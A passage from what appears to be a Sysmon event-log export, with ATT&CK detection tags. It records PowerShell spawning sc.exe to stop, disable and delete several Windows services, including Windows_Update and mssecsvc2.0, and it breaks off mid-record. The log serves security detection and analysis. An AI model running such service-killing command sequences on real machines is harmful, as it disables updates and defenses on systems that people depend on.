Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.628799000Z"",""eventRecordID"":""3836"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.625\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00109aac3000}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.625"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00109aac3000}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.865",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.603 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001095ab3000} +ProcessId: 5756 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.607610400Z"",""eventRecordID"":""3835"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.603\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001095ab3000}\r\nProcessId: 5756\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.603"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001095ab3000}"",""processId"":""5756"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.810",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.554 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00102aa93000} +ProcessId: 7832 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.560435800Z"",""eventRecordID"":""3832"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.554\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00102aa93000}\r\nProcessId: 7832\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.554"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00102aa93000}"",""processId"":""7832"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.746",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.500 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c0a63000} +ProcessId: 5272 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.507105300Z"",""eventRecordID"":""3829"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.500\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c0a63000}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.500"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010c0a63000}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.709",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.485 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010e5a53000} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Windows Managers"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Windows Managers\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.488542900Z"",""eventRecordID"":""3828"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.485\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010e5a53000}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Windows Managers\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.485"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010e5a53000}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Windows Managers\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.671",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.452 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001057a43000} +ProcessId: 5384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.455146500Z"",""eventRecordID"":""3826"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.452\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001057a43000}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.452"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001057a43000}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.625",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.398 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001001a23000} +ProcessId: 2780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 